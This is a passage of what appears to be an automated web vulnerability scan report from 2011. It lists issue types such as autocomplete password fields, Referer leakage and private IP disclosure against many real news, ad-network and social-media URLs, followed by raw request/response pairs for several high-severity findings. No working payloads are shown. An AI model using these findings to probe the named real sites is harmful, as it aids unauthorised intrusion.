14.129. http://sync.adap.tv/sync
14.130. http://sync.mathtag.com/sync/img
14.131. http://tacoda.at.atwola.com/rtx/r.js
14.132. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee
14.133. http://tags.bluekai.com/site/2964
14.134. http://tags.bluekai.com/site/38
14.135. http://tags.bluekai.com/site/4449
14.136. http://tags.bluekai.com/site/450
14.137. http://tags.bluekai.com/site/4592
14.138. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
14.139. http://tu.connect.wunderloop.net/TU/1/1/1/
14.140. http://tu.connect.wunderloop.net/TU2/1/1/1/
14.141. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
14.142. http://www.bizographics.com/collect/
14.143. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx
14.144. http://www.cars.com/go/advice/index.jsp
14.145. http://www.cars.com/go/advice/shopping/cpo/index.jsp
14.146. http://www.cars.com/go/kbb/kbbInput.jsp
14.147. http://www.cars.com/go/photogalleries/index.jsp
14.148. http://www.cars.com/go/search/advanced_search.jsp
14.149. http://www.cars.com/images/bttncapOrngR.gif
14.150. http://www.cars.com/images/long_back_orng.gif
14.151. http://www.cars.com/includes/js/makemodels-used.js
14.152. http://www.cars.com/includes/js/used-car-widget_driver.js
14.153. http://www.cars.com/test/widget/Custom/carslogo71x34.jpg
14.154. http://www.myspace.com/Modules/PostTo/Pages/
14.155. http://www.nbcudigitaladops.com/favicon.ico
14.156. http://www.newslibrary.com/nlsearch.asp
14.157. http://www.sacbee.com/reg_js/access_check.js
14.158. http://www.wtp101.com/pull_sync
14.159. http://www.youtube.com/results
15. Password field with autocomplete enabled
15.2. https://login.yahoo.com/config/login
15.3. http://slashdot.org/bookmark.pl
15.4. http://slashdot.org/bookmark.pl
15.6. http://www.ispsports.com/radio-network-affiliates.cfm
15.7. https://www.linkedin.com/secure/login
15.8. http://www.outbrain.com/privacy
15.9. http://www.sacbee.com/reg-bin/int.cgi
15.10. http://www.sacbee.com/reg-bin/int.cgi
15.11. https://www.sprint.net/
15.12. https://www.sprint.net/
15.13. https://www.sprint.net/index.php
15.14. https://www.sprint.net/index.php
15.15. http://www.thatsracin.com/reg-bin/int.cgi
15.16. http://www.thatsracin.com/reg-bin/int.cgi
15.17. http://www.thatsracin.com/reg-bin/int.cgi
17.1. http://my.textcaster.com/Default.aspx
17.2. http://stockscreener.us.reuters.com/Default.aspx
17.3. http://usata1.gcion.com/Default.aspx
17.4. http://www.wisdomtree.com/Default.aspx
18. Referer-dependent response
18.1. http://c.brightcove.com/services/viewer/federated_f9
18.2. http://www.facebook.com/plugins/like.php
18.3. http://www.facebook.com/plugins/likebox.php
18.4. http://www.facebook.com/plugins/recommendations.php
19.2. http://www.cars.com/go/advice/index.jsp
19.3. http://www.cars.com/go/crp/index.jsp
19.4. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
20. Cross-domain Referer leakage
20.1. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
20.2. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
20.3. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
20.4. http://ad.doubleclick.net/adj/mi.clt00/Sports
20.5. http://ad.doubleclick.net/adj/mi.clt00/Sports
20.6. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle
20.7. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle
20.8. http://admeld.adnxs.com/usersync
20.9. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx
20.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
20.11. http://anrtx.tacoda.net/rtx/r.js
20.12. http://cm.g.doubleclick.net/pixel
20.13. http://cm.g.doubleclick.net/pixel
20.14. http://cm.npc-mcclatchy.overture.com/js_1_0/
20.15. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
20.16. http://googleads.g.doubleclick.net/pagead/ads
20.17. http://imp.fetchback.com/serve/fb/imp
20.18. http://pixel.invitemedia.com/admeld_sync
20.19. http://rtq.careerbuilder.com/RTQ/jobstream.aspx
20.20. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html
20.21. http://www.facebook.com/plugins/likebox.php
20.22. http://www.facebook.com/plugins/recommendations.php
20.23. http://www.google.com/search
20.24. http://www.google.com/trends/hottrends
20.25. http://www.google.com/trends/hottrends
20.26. http://www.google.com/trends/hottrends
20.27. http://www.google.com/trends/hottrends
20.28. http://www.google.com/trends/hottrends
20.29. http://www.google.com/trends/hottrends
20.30. http://www.reuters.com/assets/commentsChild
21. Cross-domain script include
21.1. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
21.2. http://cdn.optmd.com/V2/89733/235451/index.html
21.3. http://charlotteobserver.adperfect.com/
21.5. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp
21.7. http://grfx.cstv.com/scripts/oas-omni-controls.js
21.8. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012
21.9. https://login.yahoo.com/config/login
21.10. http://notredame-hospitality.cbscollegestore.com/store.cfm
21.11. https://observ.subscribeobserver.com/
21.12. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
21.13. http://s3.cinesport.com/app_v2/csprt_player.js
21.14. http://s3.cinesport.com/players/charlotteobservergeneric.html
21.15. http://sacramentoconnect.sacbee.com/
21.16. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
21.17. http://slashdot.org/bookmark.pl
21.18. http://stockscreener.us.reuters.com/Stock/US/Index
21.19. http://und.cbscollegestore.com/store.cfm
21.20. http://und.cbscollegestore.com/store_contents.cfm
21.21. http://www.bayareasearchengineacademy.org/blog/
21.22. http://www.careerbuilder.com/
21.23. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx
21.24. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx
21.25. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx
21.26. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx
21.27. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx
21.28. http://www.cars.com/go/advice/index.jsp
21.29. http://www.cars.com/go/advice/shopping/cpo/index.jsp
21.30. http://www.cars.com/go/crp/index.jsp
21.31. http://www.cars.com/go/kbb/kbbInput.jsp
21.32. http://www.cars.com/go/photogalleries/index.jsp
21.33. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
21.34. http://www.charlotteobserver.com/advertising/index.html
21.35. http://www.charlotteobserver.com/newsroom/index.html
21.36. http://www.facebook.com/plugins/likebox.php
21.37. http://www.facebook.com/plugins/likebox.php
21.40. http://www.goutsa.com/ViewArticle.dbml
21.41. http://www.greenbiz.com/
21.42. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
21.43. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
21.44. http://www.reuters.com/assets/commentsChild
21.45. http://www.reuters.com/assets/newsFlash
21.46. http://www.reuters.com/assets/print
21.47. http://www.reuters.com/do/emailArticle
21.48. http://www.reuters.com/finance/markets/index
21.49. http://www.reuters.com/news/archive/topNews
21.50. http://www.reuters.com/news/pictures/slideshow
21.51. http://www.reuters.com/news/video
21.52. http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin
21.53. http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte
21.54. http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field
21.55. http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the
21.56. http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles
21.57. http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph
21.58. http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market
21.59. http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times
21.60. http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed
21.61. http://www.reuters.com/video/2011/09/03/dsk-departs
21.62. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
21.64. http://www.sacbee.com/mr/b.gif
21.65. http://www.sacbee.com/mr/e.gif
21.66. http://www.sacbee.com/mr/f.gif
21.67. http://www.sacbee.com/reg-bin/int.cgi
21.68. http://www.sacbee.com/reg-bin/tint.cgi
21.69. https://www.sprint.net/
21.70. https://www.sprint.net/index.php
21.71. http://www.stumbleupon.com/submit
21.72. http://www.thatsracin.com/reg-bin/int.cgi
21.73. http://www.tsn.ca/ncaa/story/
21.74. http://www.und.com/allaccess/
21.75. http://www.und.com/sports/m-footbl/9873956
21.76. http://www.und.com/sports/m-footbl/9874134
21.77. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
21.78. http://www.usatoday.com/community/profile.htm
21.79. http://www.usatoday.com/marketing/feedback.htm
21.80. http://www.usatoday.com/marketing/questions.htm
21.81. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
21.82. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html
21.83. http://www.youtube.com/results
23.1. http://anrtx.tacoda.net/
23.2. http://bh.contextweb.com/
23.3. http://blogs.reuters.com/
23.4. http://clk.fetchback.com/
23.7. http://image2.pubmatic.com/
23.8. http://imp.fetchback.com/
23.9. http://legolas.nexac.com/
23.11. http://matcher-rbc.bidder7.mookie1.com/
23.12. https://observ.subscribeobserver.com/
23.13. http://optimized-by.rubiconproject.com/
23.15. http://picasaweb.google.com/
23.16. http://pixel.rubiconproject.com/
23.18. http://rt.legolas-media.com/
23.19. http://sacramentoconnect.sacbee.com/
23.20. http://search.spotxchange.com/
23.21. http://shop.sprint.com/
23.22. http://tacoda.at.atwola.com/
23.23. http://tap.rubiconproject.com/
23.24. http://www.greenbiz.com/
23.26. http://www.newslibrary.com/
23.27. http://www.outbrain.com/
23.29. https://www.sprint.net/
23.30. http://www.stumbleupon.com/
24.1. http://cdn.echoenabled.com/clientapps/v2/stream.js
24.2. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json
24.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js
24.5. https://login.yahoo.com/config/login
24.6. http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js
24.7. http://odb.outbrain.com/utils/get
24.8. https://subscriberservices.mcclatchy.com/char/transactiontype.asp
24.9. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
24.10. http://www.charlotteobserver.com/advertising/index.html
24.12. http://www.google.com/trends/hottrends
24.13. http://www.idg.com/www/rd.nsf/rd
24.14. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
24.15. http://www.newslibrary.com/nlsearch.asp
24.16. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
24.18. http://www.sacbee.com/mr/b.gif
24.19. http://www.sacbee.com/mr/e.gif
24.20. http://www.sacbee.com/mr/f.gif
24.21. http://www.sacbee.com/reg-bin/int.cgi
24.22. http://www.sacbee.com/reg-bin/tint.cgi
24.23. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js
24.24. http://www.sprint.com/legal/agreement.html
24.25. http://www.sprint.com/legal/copyright.html
24.26. http://www.usatoday.com/marketing/feedback.htm
24.27. http://www.usatoday.com/marketing/questions.htm
25. Private IP addresses disclosed
25.1. http://developers.facebook.com/plugins/
25.3. http://external.ak.fbcdn.net/safe_image.php
25.4. http://external.ak.fbcdn.net/safe_image.php
25.5. http://external.ak.fbcdn.net/safe_image.php
25.6. http://external.ak.fbcdn.net/safe_image.php
25.7. http://external.ak.fbcdn.net/safe_image.php
25.8. http://external.ak.fbcdn.net/safe_image.php
25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php
25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php
25.11. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js
25.12. http://www.facebook.com/campaign/landing.php
25.13. http://www.facebook.com/extern/login_status.php
25.14. http://www.facebook.com/extern/login_status.php
25.15. http://www.facebook.com/extern/login_status.php
25.16. http://www.facebook.com/extern/login_status.php
25.17. http://www.facebook.com/extern/login_status.php
25.18. http://www.facebook.com/home.php
25.19. http://www.facebook.com/plugins/like.php
25.20. http://www.facebook.com/plugins/like.php
25.21. http://www.facebook.com/plugins/like.php
25.22. http://www.facebook.com/plugins/like.php
25.23. http://www.facebook.com/plugins/like.php
25.24. http://www.facebook.com/plugins/like.php
25.25. http://www.facebook.com/plugins/likebox.php
25.26. http://www.facebook.com/plugins/likebox.php
25.27. http://www.facebook.com/plugins/recommendations.php
25.28. http://www.facebook.com/plugins/recommendations.php
25.29. http://www.facebook.com/share.php
25.30. http://www.facebook.com/sharer.php
25.31. http://www.goutsa.com/ViewArticle.dbml
26.1. http://206537.r.msn.com/
26.2. http://243973.r.msn.com/
26.3. http://943042.r.msn.com/
26.4. http://a.tribalfusion.com/j.ad
26.6. http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6
26.7. http://ad.turn.com/server/pixel.htm
26.8. http://ad.yieldmanager.com/pixel
26.9. http://ads.undertone.com/ajs.php
26.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
26.11. http://api.affinesystems.com/event/impression
26.12. http://api.bizographics.com/v1/profile.redirect
26.13. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
26.14. http://ar.atwola.com/atd
26.15. http://as.casalemedia.com/s
26.16. http://b.scorecardresearch.com/b
26.17. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php
26.18. http://bookmarks.yahoo.com/myresults/bookmarklet
26.19. http://c.brightcove.com/services/viewer/federated_f9
26.21. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
26.22. http://cdn.gigya.com/js/socialize.js
26.23. http://cdn.optmd.com/V2/89733/235451/index.html
26.24. http://cdn.turn.com/server/ddc.htm
26.25. https://cdns.gigya.com/gs/SafariIDsProxy.htm
26.26. http://charlotteobserver.adperfect.com/
26.27. http://clk.fetchback.com/serve/fb/click
26.28. http://cm.g.doubleclick.net/pixel
26.29. http://cm.npc-mcclatchy.overture.com/js_1_0/
26.31. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp
26.33. https://docs.google.com/
26.34. http://dw.com.com/clear/c.gif
26.35. http://espn.go.com/dallas/ncf/preview
26.36. http://feedburner.google.com/fb/a/mailverify
26.37. http://findnsave.sacbee.com/api/groupon.json
26.38. http://friendfeed.com/share
26.39. http://funds.reuters.com/lipper/retail/reuters/overview.asp
26.40. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
26.41. https://google.com/accounts/Logout
26.42. http://googleads.g.doubleclick.net/aclk
26.43. http://groups.google.com/groups
26.44. http://images.google.com/support/bin/answer.py
26.45. http://imp.fetchback.com/serve/fb/adtag.js
26.46. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012
26.47. http://jlinks.industrybrains.com/jsct
26.48. http://l.addthiscdn.com/live/t00/250lo.gif
26.49. http://legolas.nexac.com/lgalt
26.50. http://links.industrybrains.com/click
26.51. http://load.exelator.com/crossdomain.xml
26.52. https://mail.google.com/mail/
26.53. https://maps-api-ssl.google.com/maps
26.54. http://maps.google.com/maps
26.55. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778
26.56. http://news.google.com/news/story
26.57. http://nextelonline.nextel.com/tl/set_tl.html
26.58. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
26.59. http://notredame-hospitality.cbscollegestore.com/store.cfm
26.60. http://ocp.ncaa.com/adFunctions.js
26.61. http://odb.outbrain.com/utils/get
26.62. http://pagead2.googlesyndication.com/pagead/imgad
26.63. http://paid.outbrain.com/network/redir
26.64. http://pbid.pro-market.net/crossdomain.xml
26.65. http://picasaweb.google.com/lh/view
26.66. http://pixel.invitemedia.com/admeld_sync
26.67. http://pixel.quantserve.com/seg/r
26.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3
26.69. http://pubads.g.doubleclick.net/gampad/ads
26.70. http://r.turn.com/server/pixel.htm
26.72. http://rt.legolas-media.com/lgrt
26.73. http://rtq.careerbuilder.com/RTQ/jobstream.aspx
26.74. http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf
26.75. http://sacramentoconnect.sacbee.com/
26.76. http://safebrowsing.clients.google.com/safebrowsing/gethash
26.77. http://scholar.google.com/scholar
26.78. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
26.79. http://search.charlotteobserver.com/search-bin/search.pl.cgi
26.80. http://search.spotxchange.com/partner
26.81. http://search2.sacbee.com/search-bin/search.pl.cgi
26.82. http://shlinks.industrybrains.com/sh
26.83. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html
26.84. http://shopping.sacbee.com/ROP/Subcat.aspx
26.85. http://simg.zedo.com/speed-test/10k.gif
26.86. https://sites.google.com/
26.87. http://slashdot.org/bookmark.pl
26.88. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
26.89. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.90. http://store.cstv.com/marketplace/store.cfm
26.91. http://sync.mathtag.com/sync/img
26.92. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee
26.93. http://tcr.tynt.com/javascripts/Tracer.js
26.94. http://traffic.outbrain.com/network/redir
26.95. http://translate.google.com/
26.96. http://trc.taboolasyndication.com/reuters/log/2/debug
26.97. http://tu.connect.wunderloop.net/TU/1/1/1/
26.98. http://twitter.com/home
26.99. http://und.cbscollegestore.com/store.cfm
26.100. http://und.cstvauctions.com/auctiondisplay.cfm
26.101. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
26.102. http://webcache.googleusercontent.com/search
26.103. http://www.bayareasearchengineacademy.org/blog/
26.104. http://www.bizographics.com/collect/
26.105. http://www.careerbuilder.com/share/login.aspx
26.106. http://www.cars.com/go/crp/index.jsp
26.107. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
26.108. http://www.facebook.com/plugins/like.php
26.109. http://www.fmglobal.com/default.aspx
26.112. http://www.google-analytics.com/__utm.gif
26.113. http://www.google.com/trends
26.114. http://www.googleadservices.com/pagead/conversion/1031221371/
26.115. http://www.greenbiz.com/
26.116. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
26.117. http://www.linkedin.com/countserv/count/share
26.118. https://www.linkedin.com/secure/login
26.119. http://www.myspace.com/Modules/PostTo/Pages/
26.120. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html
26.121. http://www.newslibrary.com/nlsearch.asp
26.122. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
26.123. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
26.124. http://www.sologig.com/
26.125. http://www.sprint.com/
26.126. https://www.sprint.net/
26.127. http://www.stumbleupon.com/submit
26.128. http://www.thatsracin.com/reg-bin/int.cgi
26.129. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html
26.130. http://www.tsn.ca/ncaa/story/
26.131. http://www.tulsaworld.com/site/articlepath.aspx
26.132. http://www.tumblr.com/share
26.133. http://www.usatoday.com/community/profile.htm
26.134. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
26.135. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml
26.136. http://www.youtube.com/results
26.137. http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg
27.1. https://cdns.gigya.com/gs/SafariIDsProxy.htm
27.2. https://maps-api-ssl.google.com/maps
27.3. https://observ.subscribeobserver.com/
27.4. https://socialize.gigya.com/gs/bookmark.aspx
27.5. https://subscriberservices.mcclatchy.com/char/transactiontype.asp
27.7. https://www.sprint.net/external_videos/pages.php
27.8. https://www.sprint.net/index.php
28. HTML does not specify charset
28.1. http://a.lingospot.com/pv_error/
28.2. http://a.tribalfusion.com/j.ad
28.3. http://ad.doubleclick.net/clk
28.4. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
28.5. http://api.js-kit.com/v1/count
28.6. http://c.brightcove.com/services/messagebroker/amf
28.8. https://cdns.gigya.com/gs/SafariIDsProxy.htm
28.9. http://content.usatoday.com/asp/uas3/uasSignedOut.htm
28.10. http://content.usatoday.com/quickquestion/jquery/1.0.1.html
28.11. http://cti.w55c.net/ct/rubicon-cms2.html
28.12. http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml
28.13. http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg
28.14. http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif
28.15. http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif
28.16. http://l1.zedo.com/log/p.html
28.17. http://links.industrybrains.com/click
28.18. http://nextelonline.nextel.com/tl/set_tl.html
28.19. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
28.20. http://pbid.pro-market.net/engine
28.21. http://pixel.quantserve.com/seg/r
28.22. http://premium.mookie1.com/2/nbc.com/ac@Bottom3
28.23. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html
28.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
28.25. https://subscriberservices.mcclatchy.com/char/transactiontype.asp
28.26. http://video.od.visiblemeasures.com/log
28.27. http://www.charlotteobserver.com/search/
28.28. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html
28.29. http://www.newslibrary.com/nlsearch.asp
28.30. http://www.reuters.com/resources/r/
28.31. http://www.usatoday.com/community/profile.htm
28.32. http://www.usatoday.com/marketing/feedback.htm
28.33. http://www.usatoday.com/marketing/questions.htm
29. Content type incorrectly stated
29.1. http://ad.doubleclick.net/clk
29.2. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
29.3. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php
29.4. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json
29.5. http://d3fd89.r.axf8.net/mr/e.gif
29.6. http://espn.go.com/dallas/ncf/preview
29.7. http://goku.brightcove.com/1pix.gif
29.8. http://imp.fetchback.com/serve/fb/adtag.js
29.9. http://js.www.reuters.com/recommend/re/fp
29.10. http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png
29.11. http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff
29.12. http://rt.disqus.com/forums/realtime-cached.js
29.13. http://rt.legolas-media.com/lgrt
29.14. http://rtq.careerbuilder.com/RTQ/jobstream.aspx
29.15. http://search.charlotteobserver.com/search-bin/search.pl.cgi
29.16. http://search2.sacbee.com/search-bin/search.pl.cgi
29.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
29.18. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
29.19. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
29.20. http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg
29.21. http://trc.taboolasyndication.com/reuters/trc/2/json
29.22. http://urls.api.twitter.com/1/urls/count.json
29.23. http://video.od.visiblemeasures.com/log
29.24. http://www.facebook.com/extern/login_status.php
29.25. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js
29.26. http://www.reuters.com/assets/breakingNews
29.27. http://www.reuters.com/assets/info
29.28. http://www.reuters.com/assets/searchIntercept
29.29. http://www.reuters.com/assets/sharedModuleLoader
29.30. http://www.reuters.com/resources/r/
29.31. http://www.sprint.com/favicon.ico
29.32. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml
30. Content type is not specified
30.1. http://load.tubemogul.com/core
30.2. http://pcm3.map.pulsemgr.com/uds/pc
Severity: | High |
Confidence: | Tentative |
Host: | http://d3fd89.r.axf8.net |
Path: | /mr/e.gif |
GET /mr/e.gif?info=%7Bn%3Ac Host: d3fd89.r.axf8.net Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Length: 3028 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:59:22 GMT <html> <head> <title>Runtime Error</title> <style> body {font-family:"Verdana" p {font-family:"Verdana" ...[SNIP]... |
GET /mr/e.gif?info=%7Bn%3Ac Host: d3fd89.r.axf8.net Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 37 Content-Type: application/x-javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:59:23 GMT gomez.b3(0,0);if(gomez.n0 |
Severity: | High |
Confidence: | Tentative |
Host: | http://ib.adnxs.com |
Path: | /getuidnb |
GET /getuidnb HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 500 No url Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Date: Sun, 04 Sep 2011 01:22:45 GMT Content-Length: 0 Connection: close |
GET /getuidnb HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Location: P.T Date: Sun, 04 Sep 2011 01:22:45 GMT Content-Length: 0 Connection: close |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.sprint.com |
Path: | /b/ss/sprintuniversa |
GET /b/ss/sprintuniversa Host: metrics.sprint.com Proxy-Connection: keep-alive Referer: http://www.sprint.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=105E1B5AD68B1 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:02:30 GMT Server: Omniture DC/2.0.0 Content-Length: 433 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/sprintuniversa ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b/ss/sprintuniversa Host: metrics.sprint.com Proxy-Connection: keep-alive Referer: http://www.sprint.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=105E1B5AD68B1 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:02:30 GMT Server: Omniture DC/2.0.0 xserver: www625 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Firm |
Host: | http://content.usatoday |
Path: | /communities/campusr |
GET /communities/campusr Host: content.usatoday.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
